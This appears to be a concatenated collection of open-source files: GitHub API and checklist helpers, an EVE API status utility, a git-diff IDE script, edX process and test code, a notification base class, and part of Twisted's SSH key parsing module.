            return json.loads(response['data'] or "null")

    def post(self, resource, data, accept=[]):
        """POST JSON `data` to `resource`; statuses in `accept` don't raise."""
        response = self.request("POST", resource, json.dumps(data), { "Content-Type": "application/json" })
        status = response['status']
        if (status < 200 or status >= 300) and status not in accept:
            sys.stderr.write("{0}\n{1}\n".format(resource, response['data']))
            raise RuntimeError("GitHub API problem: {0}".format(response['reason'] or status))
        # A write happened: invalidate cached GETs.
        self.cache.mark()
        return json.loads(response['data'])

    def patch(self, resource, data, accept=[]):
        """PATCH JSON `data` to `resource`; statuses in `accept` don't raise."""
        response = self.request("PATCH", resource, json.dumps(data), { "Content-Type": "application/json" })
        status = response['status']
        if (status < 200 or status >= 300) and status not in accept:
            sys.stderr.write("{0}\n{1}\n".format(resource, response['data']))
            raise RuntimeError("GitHub API problem: {0}".format(response['reason'] or status))
        # A write happened: invalidate cached GETs.
        self.cache.mark()
        return json.loads(response['data'])

    def statuses(self, revision):
        """Return {context: status} for our known contexts on `revision`.

        Pages through the combined-status endpoint; the first status seen
        for a context wins (the API returns newest first).
        """
        result = { }
        page = 1
        count = 100
        while count == 100:
            data = self.get("commits/{0}/status?page={1}&per_page={2}".format(revision, page, count))
            count = 0
            page += 1
            if "statuses" in data:
                for status in data["statuses"]:
                    if known_context(status["context"]) and status["context"] not in result:
                        result[status["context"]] = status
                count = len(data["statuses"])
        return result

    def pulls(self, state='open', since=None):
        """List pull requests, newest first.

        `since` is a Unix timestamp filter: closed pulls must have been
        closed after it, open pulls created after it.
        """
        result = [ ]
        page = 1
        count = 100
        while count == 100:
            pulls = self.get("pulls?page={0}&per_page={1}&state={2}&sort=created&direction=desc".format(page, count, state))
            count = 0
            page += 1
            for pull in pulls or []:
                # Check that the pulls are past the expected date
                if since:
                    closed = pull.get("closed_at", None)
                    if closed and since > time.mktime(time.strptime(closed, "%Y-%m-%dT%H:%M:%SZ")):
                        continue
                    created = pull.get("created_at", None)
                    if not closed and created and since > time.mktime(time.strptime(created, "%Y-%m-%dT%H:%M:%SZ")):
                        continue
                result.append(pull)
                count += 1
        return result

    # The since argument is seconds since the issue was either
    # created (for open issues) or closed (for closed issues)
    def issues(self, labels=[ "bot" ], state="open", since=None):
        """List issues matching `labels` and `state`, filtered by `since`."""
        result = [ ]
        page = 1
        count = 100
        opened = True
        label = ",".join(labels)
        while count == 100 and opened:
            req = "issues?labels={0}&state=all&page={1}&per_page={2}".format(label, page, count)
            issues = self.get(req)
            count = 0
            page += 1
            opened = False
            for issue in issues:
                count += 1
                # On each loop of 100 issues we must encounter at least 1 open issue
                if issue["state"] == "open":
                    opened = True
                # Make sure the state matches
                if state != "all" and issue["state"] != state:
                    continue
                # Check that the issues are past the expected date
                if since:
                    closed = issue.get("closed_at", None)
                    if closed and since > time.mktime(time.strptime(closed, "%Y-%m-%dT%H:%M:%SZ")):
                        continue
                    created = issue.get("created_at", None)
                    if not closed and created and since > time.mktime(time.strptime(created, "%Y-%m-%dT%H:%M:%SZ")):
                        continue
                result.append(issue)
        return result

    def commits(self, branch='master', since=None):
        """Yield commits on `branch`, optionally only those after `since`
        (Unix timestamp), paging through the API lazily."""
        page = 1
        count = 100
        if since:
            since = "&since={0}".format(time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(since)))
        else:
            since = ""
        while count == 100:
            commits = self.get("commits?page={0}&per_page={1}&sha={2}{3}".format(page, count, branch, since))
            count = 0
            page += 1
            for commit in commits or []:
                yield commit
                count += 1

    def whitelist(self):
        """Return the set of logins belonging to the Contributors team."""
        users = set()
        teamId = self.teamIdFromName(TEAM_CONTRIBUTORS)

        page = 1
        count = 100
        while count == 100:
            data = self.get("/teams/{0}/members?page={1}&per_page={2}".format(teamId, page, count)) or []
            users.update(user.get("login") for user in data)
            count = len(data)
            page += 1
        return users

    def teamIdFromName(self, name):
        """Return the id of the cockpit-project team called `name`.

        Raises KeyError when no such team exists.
        """
        for team in self.get("/orgs/cockpit-project/teams") or []:
            if team.get("name") == name:
                return team["id"]
        else:
            raise KeyError("Team {0} not found".format(name))
class Checklist(object):
    """Parse and manipulate GitHub-style markdown task lists.

    The checklist is kept in two synchronised forms: the markdown text
    (``self.body``) and a mapping (``self.items``) from item text to its
    state. A state is True/False for checked/unchecked, or a string status
    (e.g. "FAIL") for items rendered with a "status: item" prefix.
    """

    def __init__(self, body=None):
        """Initialise from markdown `body`; empty checklist when None."""
        self.process(body or "")

    @staticmethod
    def format_line(item, check):
        """Render one markdown task-list line for `item`.

        `check` is either a boolean (checked state) or a string status, in
        which case the line is rendered unchecked with a "status: " prefix.
        """
        status = ""
        if isinstance(check, str):
            status = check + ": "
            check = False
        return " * [{0}] {1}{2}".format("x" if check else " ", status, item)

    @staticmethod
    def parse_line(line):
        """Parse one markdown line into an ``(item, check)`` tuple.

        Returns ``(None, None)`` for lines that are not task-list entries.
        `check` is True/False for a plain item, or the status string when
        the item text carries a "status: " prefix.
        """
        check = item = None
        stripped = line.strip()
        if stripped[:6] in ["* [ ] ", "- [ ] ", "* [x] ", "- [x] ", "* [X] ", "- [X] "]:
            status, unused, item = stripped[6:].strip().partition(": ")
            if not item:
                item = status
                status = None
            if status:
                check = status
            else:
                # Character 3 of the prefix is the checkbox mark.
                check = stripped[3] in ["x", "X"]
        return (item, check)

    def process(self, body, items=None):
        """Rebuild ``self.body`` and ``self.items`` from markdown `body`.

        `items` maps item text to a state override; overrides are applied
        to matching lines, and any overrides for unknown items are
        appended as new lines.
        """
        # Copy into a fresh dict so the caller's mapping is never mutated.
        # (The previous signature used a mutable default argument.)
        items = dict(items) if items else { }
        self.items = { }
        lines = [ ]
        for line in body.splitlines():
            (item, check) = self.parse_line(line)
            if item:
                if item in items:
                    check = items[item]
                    del items[item]
                line = self.format_line(item, check)
                self.items[item] = check
            lines.append(line)
        # Whatever overrides remain name items not present in the body.
        for item, check in items.items():
            lines.append(self.format_line(item, check))
            self.items[item] = check
        self.body = "\n".join(lines)

    def check(self, item, checked=True):
        """Set the checked state (or string status) of `item`."""
        self.process(self.body, { item: checked })

    def add(self, item):
        """Append `item` to the checklist as a new unchecked entry."""
        self.process(self.body, { item: False })
| lgpl-2.1 |
viarr/eve-wspace | evewspace/POS/utils.py | 6 | 1765 | # Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from models import CorpPOS
import eveapi
from API import cache_handler as handler
def add_status_info(poses):
    """Accepts a list of corp poses and returns a list of POSes with
    status information attached.

    Each returned posstatus object has the following attributes:
      itemid: the POS item id
      pos:    POS object processed
      status: Status retrieved from the EVE API
    """
    class statusentry:
        def __init__(self, pos, status):
            self.itemid = pos.apiitemid
            self.pos = pos
            self.status = status

    def _fetch_status(api, pos):
        # Authenticate with the API key tied to this POS, then pull
        # the starbase detail for its item id.
        corp_auth = api.auth(keyID=pos.apikey.keyid, vCode=pos.apikey.vcode)
        detail = corp_auth.corp.StarbaseDetail(itemID=pos.apiitemid)
        return statusentry(pos, detail)

    # Now that we have a corp authenticated API, let's play with some POSes
    api = eveapi.EVEAPIConnection(cacheHandler=handler)
    return [_fetch_status(api, pos) for pos in poses]
| gpl-3.0 |
GeyerA/android_external_chromium_org | tools/git/git-diff-ide.py | 197 | 2668 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Invokes git diff [args...] and inserts file:line in front of each line of diff
output where possible.
This is useful from an IDE that allows you to double-click lines that begin
with file:line to open and jump to that point in the file.
Synopsis:
%prog [git diff args...]
Examples:
%prog
%prog HEAD
"""
import subprocess
import sys
def GitShell(args, ignore_return=False):
    """A shell invocation suitable for communicating with git. Returns
    output as list of lines, raises exception on error.

    Args:
      args: shell command string to run (passed to the shell verbatim).
      ignore_return: when True, a non-zero exit status is not an error.

    NOTE(review): shell=True executes `args` through the shell; callers
    must not pass untrusted input in the command string.
    """
    # NOTE: this file is Python 2 (print statements below).
    job = subprocess.Popen(args,
                           shell=True,
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
    # stderr is merged into stdout above, so `err` is always empty.
    (out, err) = job.communicate()
    if job.returncode != 0 and not ignore_return:
        print out
        raise Exception("Error %d running command %s" % (
            job.returncode, args))
    return out.split('\n')
def PrintGitDiff(extra_args):
  """Outputs git diff extra_args with file:line inserted into relevant lines.

  Lines that carry diff metadata (diff/index/---/+++/@@) are passed
  through unchanged; every other line is prefixed with the current file
  and the line number it maps to in the new version of the file.
  """
  current_file = '';
  line_num = 0;
  lines = GitShell('git diff %s' % ' '.join(extra_args))
  for line in lines:
    # Pass-through lines:
    #   diff --git a/file.c b/file.c
    #   index 0e38c2d..8cd69ae 100644
    #   --- a/file.c
    if (line.startswith('diff ') or
        line.startswith('index ') or
        line.startswith('--- ')):
      print line
      continue
    # Get the filename from the +++ line:
    #   +++ b/file.c
    if line.startswith('+++ '):
      # Filename might be /dev/null or a/file or b/file.
      # Skip the first two characters unless it starts with /.
      # NOTE(review): assumes the line has at least 5 characters; a bare
      # '+++ ' line would raise IndexError -- git shouldn't emit one.
      current_file = line[4:] if line[4] == '/' else line[6:]
      print line
      continue
    # Update line number from the @@ lines:
    #   @@ -41,9 +41,9 @@ def MyFunc():
    #             ^^
    if line.startswith('@@ '):
      # new_nr looks like '+41,9'; int('+41') parses the leading sign fine.
      _, old_nr, new_nr, _ = line.split(' ', 3)
      line_num = int(new_nr.split(',')[0])
      print line
      continue
    print current_file + ':' + repr(line_num) + ':' + line
    # Increment line number for lines that start with ' ' or '+':
    # @@ -41,4 +41,4 @@ def MyFunc():
    # file.c:41: // existing code
    # file.c:42: // existing code
    # file.c:43:-// deleted code
    # file.c:43:-// deleted code
    # file.c:43:+// inserted code
    # file.c:44:+// inserted code
    # ('-' lines deliberately do not advance line_num: they no longer
    # occupy a line in the new file.)
    if line.startswith(' ') or line.startswith('+'):
      line_num += 1
def main():
  """Entry point: forward all command-line arguments to PrintGitDiff."""
  PrintGitDiff(sys.argv[1:])
# Allow use both as a script and as an importable module.
if __name__ == '__main__':
  main()
| bsd-3-clause |
eduNEXT/edx-platform | pavelib/utils/process.py | 3 | 3512 | """
Helper functions for managing processes.
"""
import atexit
import os
import signal
import subprocess
import sys
import psutil
from paver import tasks
def kill_process(proc):
    """
    Kill the process `proc` created with `subprocess`.

    NOTE(review): despite the name, this sends SIGKILL only to the
    *children* of `proc` (recursively), not to `proc` itself.  Callers
    start commands with shell=True, so `proc` is the shell and the real
    work happens in its children -- presumably the shell exits on its own
    once they die; confirm before relying on `proc` being terminated.
    """
    p1_group = psutil.Process(proc.pid)
    child_pids = p1_group.children(recursive=True)
    for child_pid in child_pids:
        os.kill(child_pid.pid, signal.SIGKILL)
def run_multi_processes(cmd_list, out_log=None, err_log=None):
    """
    Run each shell command in `cmd_list` in a separate process,
    piping stdout to `out_log` (a path) and stderr to `err_log` (also a path).
    Terminates the processes on CTRL-C and ensures the processes are killed
    if an error occurs.

    Blocks in signal.pause() until CTRL-C is pressed; all started
    processes share the same stdout/stderr log files.
    """
    # All commands share one kwargs dict (and thus one pair of log files).
    kwargs = {'shell': True, 'cwd': None}
    # NOTE: despite the name, `pids` holds Popen objects, not pid ints.
    pids = []
    if out_log:
        out_log_file = open(out_log, 'w')  # lint-amnesty, pylint: disable=consider-using-with
        kwargs['stdout'] = out_log_file
    if err_log:
        err_log_file = open(err_log, 'w')  # lint-amnesty, pylint: disable=consider-using-with
        kwargs['stderr'] = err_log_file
    # If the user is performing a dry run of a task, then just log
    # the command strings and return so that no destructive operations
    # are performed.
    if tasks.environment.dry_run:
        for cmd in cmd_list:
            tasks.environment.info(cmd)
        return
    try:
        for cmd in cmd_list:
            pids.extend([subprocess.Popen(cmd, **kwargs)])
        # pylint: disable=unused-argument
        def _signal_handler(*args):
            """
            What to do when process is ended
            """
            print("\nEnding...")
        # Install the handler, then sleep until a signal (e.g. CTRL-C)
        # arrives; the finally block below does the actual cleanup.
        signal.signal(signal.SIGINT, _signal_handler)
        print("Enter CTL-C to end")
        signal.pause()
        print("Processes ending")
    # pylint: disable=broad-except
    except Exception as err:
        print(f"Error running process {err}", file=sys.stderr)
    finally:
        # Always reap children, whether we exited via CTRL-C or an error.
        for pid in pids:
            kill_process(pid)
def run_process(cmd, out_log=None, err_log=None):
    """
    Convenience wrapper around `run_multi_processes` for a single command.

    Runs the shell command `cmd` in its own process, sending stdout to the
    file at path `out_log` and stderr to the file at path `err_log` (each
    optional).  The process is terminated on CTRL-C or if an error occurs.
    """
    # Delegate to the multi-process runner with a one-element command list.
    return run_multi_processes([cmd], out_log=out_log, err_log=err_log)
def run_background_process(cmd, out_log=None, err_log=None, cwd=None):
    """
    Runs a command as a background process. Sends SIGINT at exit.

    The started process is NOT waited on here; cleanup happens in an
    atexit handler, which signals the process's children and then waits
    for the process itself.
    """
    kwargs = {'shell': True, 'cwd': cwd}
    if out_log:
        out_log_file = open(out_log, 'w')  # lint-amnesty, pylint: disable=consider-using-with
        kwargs['stdout'] = out_log_file
    if err_log:
        err_log_file = open(err_log, 'w')  # lint-amnesty, pylint: disable=consider-using-with
        kwargs['stderr'] = err_log_file
    proc = subprocess.Popen(cmd, **kwargs)  # lint-amnesty, pylint: disable=consider-using-with
    def exit_handler():
        """
        Send SIGINT to the process's children. This is important
        for running commands under coverage, as coverage will not
        produce the correct artifacts if the child process isn't
        killed properly.
        """
        # `proc` itself is the shell (shell=True); signal its children,
        # mirroring kill_process() above but with SIGINT instead of SIGKILL.
        p1_group = psutil.Process(proc.pid)
        child_pids = p1_group.children(recursive=True)
        for child_pid in child_pids:
            os.kill(child_pid.pid, signal.SIGINT)
        # Wait for process to actually finish
        proc.wait()
    atexit.register(exit_handler)
| agpl-3.0 |
verycumbersome/the-blue-alliance | notifications/base_notification.py | 3 | 7224 | import logging
import random
import tba_config
import urllib
import uuid
from google.appengine.ext import deferred
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from controllers.gcm.gcm import GCMMessage
from consts.client_type import ClientType
from consts.notification_type import NotificationType
from helpers.notification_sender import NotificationSender
from models.sitevar import Sitevar
class BaseNotification(object):
    # List of clients this notification type supports (these are default values)
    # Can be overridden by subclasses to only send to some types
    _supported_clients = [ClientType.OS_ANDROID, ClientType.WEBHOOK, ClientType.WEB]

    # If not None, the event feed to post this notification to
    # Typically the event key
    _event_feed = None

    # If not None, the district feed to post this notification to
    # Typically, district abbreviation from consts/district_type
    _district_feed = None

    # Send analytics updates for this notification?
    # Can be overridden by subclasses if not
    _track_call = True

    # GCM Priority for this message, set to "High" for important pushes
    # Valid types are 'high' and 'normal'
    # https://developers.google.com/cloud-messaging/concept-options#setting-the-priority-of-a-message
    _priority = 'normal'

    # If set to (key, timeout_seconds), won't send multiple notifications
    # within timeout_seconds of one another (best-effort; see send()).
    _timeout = None

    # NOTE(review): this bare string is a statement, not the class
    # docstring -- it is not the first statement in the class body.
    """
    Class that acts as a basic notification.
    To send a notification, instantiate one and call this method
    """
    def send(self, keys, push_firebase=True, track_call=True):
        """
        Queue this notification for rendering and delivery.

        :param keys: dict like {ClientType: [key]}; webhook entries are
            (url, secret) tuples.
        :param push_firebase: unused in this method -- presumably consumed
            by subclasses or legacy callers; confirm before removing.
        :param track_call: when False, skip the deferred analytics task
            even if the class enables tracking.
        """
        if self._timeout is not None:
            key, timeout = self._timeout
            if memcache.get(key):  # Using memcache is a hacky implementation, since it is not guaranteed.
                logging.info("Notification timeout for: {}".format(key))
                return  # Currently in timeout. Don't send.
            else:
                memcache.set(key, True, timeout)
        self.keys = keys  # dict like {ClientType : [ key ] } ... The list for webhooks is a tuple of (key, secret)
        # Actual rendering/sending happens on a task queue, not inline.
        deferred.defer(self.render, self._supported_clients, _queue="push-notifications")
        if self._track_call and track_call:
            num_keys = 0
            for v in keys.values():
                # Count the number of clients receiving the notification
                num_keys += len(v)
            # Sample analytics calls to stay under quota.
            if random.random() < tba_config.GA_RECORD_FRACTION:
                deferred.defer(self.track_notification, self._type, num_keys, _queue="api-track-call")

    """
    This method will create platform specific notifications and send them to the platform specified
    Clients should implement the referenced methods in order to build the notification for each platform
    """
    def render(self, client_types):
        """Build and send the platform-specific payload for each client type."""
        if not isinstance(client_types, list):
            # Listify client types, if needed
            client_types = [client_types]
        if not self.check_enabled():
            # Don't send for NotificationTypes that aren't enabled
            return
        for client_type in client_types:
            if client_type == ClientType.OS_ANDROID and ClientType.OS_ANDROID in self.keys:
                notification = self._render_android()
                if len(self.keys[ClientType.OS_ANDROID]) > 0:  # this is after _render because if it's an update fav/subscription notification, then
                    NotificationSender.send_gcm(notification)  # we remove the client id that sent the update so it doesn't get notified redundantly
            elif client_type == ClientType.OS_IOS and ClientType.OS_IOS in self.keys:
                notification = self._render_ios()
                NotificationSender.send_ios(notification)
            # NOTE(review): WEB/WEBHOOK start a new if-chain on purpose, so
            # they are checked even when the ANDROID/IOS branch matched above.
            if client_type == ClientType.WEB and ClientType.WEB in self.keys:
                notification = self._render_web()
                if len(self.keys[ClientType.WEB]) > 0:  # this is after _render because if it's an update fav/subscription notification, then
                    NotificationSender.send_gcm(notification)  # we remove the client id that sent the update so it doesn't get notified redundantly
            elif client_type == ClientType.WEBHOOK and ClientType.WEBHOOK in self.keys and len(self.keys[ClientType.WEBHOOK]) > 0:
                notification = self._render_webhook()
                NotificationSender.send_webhook(notification, self.keys[ClientType.WEBHOOK])

    def check_enabled(self):
        # Notifications are on unless the 'notifications.enable' sitevar
        # exists and holds anything other than the string "true".
        var = Sitevar.get_by_id('notifications.enable')
        return var is None or var.values_json == "true"

    """
    Subclasses should override this method and return a dict containing the payload of the notification.
    The dict should have two entries: 'message_type' (should be one of NotificationType, string) and 'message_data'
    """
    def _build_dict(self):
        raise NotImplementedError("Subclasses must implement this method to build JSON data to send")

    @property
    def _type(self):
        # Subclasses return a NotificationType enum value here.
        raise NotImplementedError("Subclasses must implement this message to set its notification type")

    """
    The following methods are default render methods. Often, the way we construct the messages doesn't change, so we abstract it to here.
    However, if a notification type needs to do something special (e.g. specify a GCM collapse key), then subclasses can override them
    in order to provide that functionality.
    """
    def _render_android(self):
        # Default Android payload: the raw dict wrapped in a GCM message.
        gcm_keys = self.keys[ClientType.OS_ANDROID]
        data = self._build_dict()
        return GCMMessage(gcm_keys, data, priority=self._priority)

    def _render_ios(self):
        # iOS delivery is not implemented in the base class.
        pass

    def _render_web(self):
        # Web push uses the same GCM message shape as Android.
        gcm_keys = self.keys[ClientType.WEB]
        data = self._build_dict()
        return GCMMessage(gcm_keys, data, priority=self._priority)

    def _render_webhook(self):
        # Webhooks receive the raw payload dict.
        return self._build_dict()

    # used for deferred analytics call
    def track_notification(self, notification_type_enum, num_keys):
        """
        For more information about GAnalytics Protocol Parameters, visit
        https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters
        """
        analytics_id = Sitevar.get_by_id("google_analytics.id")
        if analytics_id is None:
            logging.warning("Missing sitevar: google_analytics.id. Can't track API usage.")
        else:
            GOOGLE_ANALYTICS_ID = analytics_id.contents['GOOGLE_ANALYTICS_ID']
            params = urllib.urlencode({
                'v': 1,
                'tid': GOOGLE_ANALYTICS_ID,
                'cid': uuid.uuid3(uuid.NAMESPACE_X500, str('tba-notification-tracking')),
                't': 'event',
                'ec': 'notification',
                'ea': NotificationType.type_names[notification_type_enum],
                'ev': num_keys,
                'ni': 1,
                'sc': 'end',  # forces tracking session to end
            })
            analytics_url = 'http://www.google-analytics.com/collect?%s' % params
            urlfetch.fetch(
                url=analytics_url,
                method=urlfetch.GET,
                deadline=10,
            )
| mit |
arbrandes/edx-platform | openedx/core/djangoapps/catalog/management/commands/tests/test_sync_course_runs.py | 4 | 4270 | """
Tests for the sync course runs management command.
"""
from unittest import mock
import ddt
from django.core.management import call_command
from openedx.core.djangoapps.catalog.tests.factories import CourseRunFactory
from openedx.core.djangoapps.catalog.management.commands.sync_course_runs import Command as sync_command
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
COMMAND_MODULE = 'openedx.core.djangoapps.catalog.management.commands.sync_course_runs'
@ddt.ddt
@mock.patch(COMMAND_MODULE + '.get_course_runs')
class TestSyncCourseRunsCommand(ModuleStoreTestCase):
    """
    Test for the sync course runs management command.

    The class-level patch injects `mock_catalog_course_runs` as the last
    positional argument of every test method.
    """
    def setUp(self):
        super().setUp()
        # create mongo course
        self.course = CourseFactory.create()
        # load this course into course overview
        self.course_overview = CourseOverview.get_from_id(self.course.id)
        # create a catalog course run with the same course id.
        self.catalog_course_run = CourseRunFactory(
            key=str(self.course.id),
            marketing_url='test_marketing_url',
            eligible_for_financial_aid=False
        )

    def test_course_run_sync(self, mock_catalog_course_runs):
        """
        Verify on executing management command course overview data is updated
        with course run data from course discovery.
        """
        mock_catalog_course_runs.return_value = [self.catalog_course_run]
        call_command('sync_course_runs')
        updated_course_overview = CourseOverview.objects.get(id=self.course.id)
        # assert fields have updated
        for field in sync_command.course_run_fields:
            course_overview_field_name = field.course_overview_name
            catalog_field_name = field.catalog_name
            previous_course_overview_value = getattr(self.course_overview, course_overview_field_name)
            updated_course_overview_value = getattr(updated_course_overview, course_overview_field_name)
            # course overview value matches catalog value
            assert updated_course_overview_value == self.catalog_course_run.get(catalog_field_name)  # pylint: disable=no-member, line-too-long
            # new value doesn't match old value
            assert updated_course_overview_value != previous_course_overview_value

    @mock.patch(COMMAND_MODULE + '.log.info')
    def test_course_overview_does_not_exist(self, mock_log_info, mock_catalog_course_runs):
        """
        Verify no error in case if a course run is not found in course overview.
        """
        # A catalog course run with no matching modulestore course.
        nonexistent_course_run = CourseRunFactory()
        mock_catalog_course_runs.return_value = [self.catalog_course_run, nonexistent_course_run]
        call_command('sync_course_runs')
        mock_log_info.assert_any_call(
            '[sync_course_runs] course overview record not found for course run: %s',
            nonexistent_course_run['key'],
        )
        # The existing course is still synced despite the missing one.
        updated_marketing_url = CourseOverview.objects.get(id=self.course.id).marketing_url
        assert updated_marketing_url == 'test_marketing_url'

    @mock.patch(COMMAND_MODULE + '.log.info')
    def test_starting_and_ending_logs(self, mock_log_info, mock_catalog_course_runs):
        """
        Verify logging at start and end of the command.
        """
        def _assert_logs(num_updates):
            # Counts: 3 catalog runs, 1 found in course overview, 2 missing.
            mock_log_info.assert_any_call('[sync_course_runs] Fetching course runs from catalog service.')
            mock_log_info.assert_any_call(
                '[sync_course_runs] course runs found in catalog: %d, course runs found in course overview: %d,'
                ' course runs not found in course overview: %d, course overviews updated: %d',
                3,
                1,
                2,
                num_updates,
            )
            mock_log_info.reset_mock()
        mock_catalog_course_runs.return_value = [self.catalog_course_run, CourseRunFactory(), CourseRunFactory()]
        # First run updates the overview; the second is a no-op.
        call_command('sync_course_runs')
        _assert_logs(num_updates=1)
        call_command('sync_course_runs')
        _assert_logs(num_updates=0)
| agpl-3.0 |
kenorb-contrib/BitTorrent | twisted/conch/ssh/keys.py | 2 | 16522 | # Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
#
"""Handling of RSA and DSA keys.
This module is unstable.
Maintainer: U{Paul Swartz<mailto:z3p@twistedmatrix.com>}
"""
# base library imports
import base64
import string
import sha, md5
# external library imports
from Crypto.Cipher import DES3
from Crypto.PublicKey import RSA, DSA
from Crypto import Util
#twisted
from twisted.python import log
# sibling imports
import asn1, common, sexpy
class BadKeyError(Exception):
    """
    Raised when a key blob or key file is not in the expected format,
    is of an unsupported type, or cannot be decrypted.

    XXX: we really need to check for bad keys
    """
def getPublicKeyString(filename = None, line = 0, data = ''):
    """
    Return a public key string given a filename or data of a public key.
    Currently handles OpenSSH and LSH keys.

    @type filename: C{str}
    @type line: C{int}
    @type data: C{str}
    @rtype: C{str}
    @raises BadKeyError: if the data is in neither LSH nor OpenSSH format.
    """
    if filename:
        # Fix: close the file explicitly instead of leaking the handle
        # (the old code relied on CPython refcounting to close it).
        f = open(filename)
        try:
            lines = f.readlines()
        finally:
            f.close()
        data = lines[line]
    if data[0] == '{': # lsh key
        return getPublicKeyString_lsh(data)
    elif data.startswith('ssh-'): # openssh key
        return getPublicKeyString_openssh(data)
    else:
        raise BadKeyError('unknown type of key')
def getPublicKeyString_lsh(data):
    """
    Convert an LSH-format public key (a base64 S-expression wrapped in
    braces) into the SSHv2 wire-format public key blob.

    @raises BadKeyError: if the S-expression holds an unknown key type.
    """
    # Strip the surrounding '{' and '}' before base64-decoding the sexp.
    sexp = sexpy.parse(base64.decodestring(data[1:-1]))
    assert sexp[0] == 'public-key'
    kd = {}
    for name, data in sexp[1][1:]:
        kd[name] = common.NS(data)
    if sexp[1][0] == 'dsa':
        assert len(kd) == 4, len(kd)
        # '\x00\x00\x00\x07ssh-dss' is NS('ssh-dss') spelled out literally.
        return '\x00\x00\x00\x07ssh-dss' + kd['p'] + kd['q'] + kd['g'] + kd['y']
    elif sexp[1][0] == 'rsa-pkcs1-sha1':
        assert len(kd) == 2, len(kd)
        return '\x00\x00\x00\x07ssh-rsa' + kd['e'] + kd['n']
    else:
        raise BadKeyError('unknown lsh key type %s' % sexp[1][0])
def getPublicKeyString_openssh(data):
    """
    Convert an OpenSSH public key line ('<type> <base64> [comment]') into
    the SSHv2 wire-format public key blob.  The type field is parsed but
    not validated against anything.
    """
    fileKind, fileData = data.split()[:2]
    # if fileKind != kind:
    # raise BadKeyError, 'key should be %s but instead is %s' % (kind, fileKind)
    return base64.decodestring(fileData)
def makePublicKeyString(obj, comment = '', kind = 'openssh'):
    """
    Return an public key given a C{Crypto.PublicKey.pubkey.pubkey}
    object.
    kind is one of ('openssh', 'lsh')

    @type obj: C{Crypto.PublicKey.pubkey.pubkey}
    @type comment: C{str}
    @type kind: C{str}
    @rtype: C{str}
    @raises BadKeyError: if C{kind} is not 'openssh' or 'lsh'.
    """
    if kind == 'lsh':
        # The LSH format has no place for a comment, so it is dropped.
        return makePublicKeyString_lsh(obj) # no comment
    elif kind == 'openssh':
        return makePublicKeyString_openssh(obj, comment)
    else:
        raise BadKeyError('bad kind %s' % kind)
def makePublicKeyString_lsh(obj):
    """
    Serialize a key object as an LSH public key: a canonical S-expression,
    base64-encoded and wrapped in braces.  MP()[4:] strips the 4-byte
    length prefix, leaving just the big-endian integer bytes.

    @raises BadKeyError: if the object is neither an RSA nor a DSA key.
    """
    keyType = objectType(obj)
    if keyType == 'ssh-rsa':
        keyData = sexpy.pack([['public-key', ['rsa-pkcs1-sha1',
                                              ['n', common.MP(obj.n)[4:]],
                                              ['e', common.MP(obj.e)[4:]]]]])
    elif keyType == 'ssh-dss':
        keyData = sexpy.pack([['public-key', ['dsa',
                                              ['p', common.MP(obj.p)[4:]],
                                              ['q', common.MP(obj.q)[4:]],
                                              ['g', common.MP(obj.g)[4:]],
                                              ['y', common.MP(obj.y)[4:]]]]])
    else:
        raise BadKeyError('bad keyType %s' % keyType)
    return '{' + base64.encodestring(keyData).replace('\n','') + '}'
def makePublicKeyString_openssh(obj, comment):
    """
    Serialize a key object as an OpenSSH public key line:
    '<type> <base64 of NS(type)+key data> <comment>'.

    @raises BadKeyError: if the object is neither an RSA nor a DSA key.
    """
    keyType = objectType(obj)
    if keyType == 'ssh-rsa':
        keyData = common.MP(obj.e) + common.MP(obj.n)
    elif keyType == 'ssh-dss':
        keyData = common.MP(obj.p)
        keyData += common.MP(obj.q)
        keyData += common.MP(obj.g)
        keyData += common.MP(obj.y)
    else:
        raise BadKeyError('unknown key type %s' % keyType)
    # encodestring inserts newlines every 76 chars; strip them for one line.
    b64Data = base64.encodestring(common.NS(keyType)+keyData).replace('\n', '')
    return '%s %s %s' % (keyType, b64Data, comment)
def getPublicKeyObject(data):
    """
    Return a C{Crypto.PublicKey.pubkey.pubkey} corresponding to the SSHv2
    public key data. data is in the over-the-wire public key format.

    @type data: C{str}
    @rtype: C{Crypto.PublicKey.pubkey.pubkey}
    @raises BadKeyError: if the blob's type string is unrecognized.
    """
    keyKind, rest = common.getNS(data)
    if keyKind == 'ssh-rsa':
        e, rest = common.getMP(rest)
        n, rest = common.getMP(rest)
        return RSA.construct((n, e))
    elif keyKind == 'ssh-dss':
        # Wire order is p, q, g, y; DSA.construct expects (y, g, p, q).
        p, rest = common.getMP(rest)
        q, rest = common.getMP(rest)
        g, rest = common.getMP(rest)
        y, rest = common.getMP(rest)
        return DSA.construct((y, g, p, q))
    else:
        raise BadKeyError('unknown key type %s' % keyKind)
def getPrivateKeyObject(filename = None, data = '', passphrase = ''):
    """
    Return a C{Crypto.PublicKey.pubkey.pubkey} object corresponding to the
    private key file/data. If the private key is encrypted, passphrase B{must}
    be specified, other wise a C{BadKeyError} will be raised.

    @type filename: C{str}
    @type data: C{str}
    @type passphrase: C{str}
    @raises BadKeyError: if the key is invalid or a passphrase is not specified
    """
    if filename:
        # Fix: close the file explicitly instead of leaking the handle
        # (the old code relied on CPython refcounting to close it).
        f = open(filename)
        try:
            data = f.readlines()
        finally:
            f.close()
    else:
        # Normalize raw data into a list of newline-terminated lines so the
        # per-format helpers can treat both inputs identically.
        data = [x+'\n' for x in data.split('\n')]
    if data[0][0] == '(': # lsh key
        return getPrivateKeyObject_lsh(data, passphrase)
